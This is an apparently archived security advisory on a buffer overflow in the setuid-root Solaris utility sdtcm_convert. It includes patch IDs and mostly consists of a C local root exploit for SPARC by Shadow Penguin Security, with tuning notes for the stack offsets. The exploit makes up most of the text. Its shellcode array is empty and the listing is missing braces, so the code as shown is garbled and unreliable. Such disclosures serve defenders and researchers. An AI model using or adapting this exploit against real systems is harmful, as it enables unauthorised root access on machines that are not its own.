

    Solaris 2.4, 2.5, 2.5.1, 2.6 and 7(only x86 for last one)


    Following  is  based  on   Sun  Microsystems  Security   Bulletin.
    sdtcm_convert is  a setuid-root  calendar data  conversion utility
    which converts  version 3  (OpenWindows) calendar  data format  to
    version 4 (extensible  calendar data format),  and vice versa.   A
    buffer overflow has been discovered which may be exploited to gain
    root access.

    Exploit follows.  The epxloit is said to work on both Solaris  2.6
    and 7,  but the  author fails  to provide  offsets for  Solaris 7.
    You may wish to change the

        #define     ADJUST      2

    value to 1 for Solaris.

       sdtcm_convert Overflow Exploits( for Sparc Edition)
       The Shadow Penguin Security (
       Written by UNYUN (

            % gcc ex_sdtcm_convert.c (This example program)
            % a.out
            If no response, hit ctrl+c


    #define     ADJUST      2
    #define     OFFSET1     4000
    #define     LENGTH1     260
    #define     OFFSET2     6000
    #define     LENGTH2     1000
    #define     OFFSET3     6000+16*30

    #define NOP 0xa61cc013

    char exploit_code[] =

    unsigned long get_sp(void)
    __asm__("mov %sp,%i0 \n");

    unsigned long ret_adr;
    int i;

        static char x[11000];

        for (i = 0; i < 5000 ; i+=4){
            x[i+3]=ret_adr & 0xff;
            x[i+2]=(ret_adr >> 8 ) &0xff;
            x[i+1]=(ret_adr >> 16 ) &0xff;
            x[i+0]=(ret_adr >> 24 ) &0xff;
        ret_adr=get_sp() - 10200;
        if ((ret_adr & 0xff )==0) ret_adr+=4;
        for (i = OFFSET1+ADJUST; i < OFFSET1+LENGTH1 ; i+=4){
            x[i+3]=ret_adr & 0xff;
            x[i+2]=(ret_adr >> 8 ) &0xff;
            x[i+1]=(ret_adr >> 16 ) &0xff;
            x[i+0]=(ret_adr >> 24 ) &0xff;
        for (i = OFFSET2+ADJUST; i < OFFSET2+LENGTH2 ; i+=4){
            x[i+3]=NOP & 0xff;
            x[i+2]=(NOP >> 8 ) &0xff;
            x[i+1]=(NOP >> 16 ) &0xff;
            x[i+0]=(NOP >> 24 ) &0xff;
        for (i=0;i<strlen(exploit_code);i++)x[OFFSET3+ADJUST+i]=exploit_code[i];
        execl("/usr/dt/bin/sdtcm_convert", "sdtcm_convert", "-d",x,"test",(char *) 0);


    Sun recommends that you install the respective patches immediately
    on affected systems:

        CDE Version     Patch ID
        ___________     _________
        1.3             107022-01
        1.3_x86         107023-01
        1.2             105566-06
        1.2_x86         105567-07
        1.0.2           103670-06
        1.0.2_x86       103717-06
        1.0.1           103671-06
        1.0.1_x86       103718-06

    With the patch installed the exploit fails thus:

        s4u-26% ./sdtcm_convert_exploit
        Problem accessing calendar file /usr/spool/calendar/callog.test:
        No such file or directory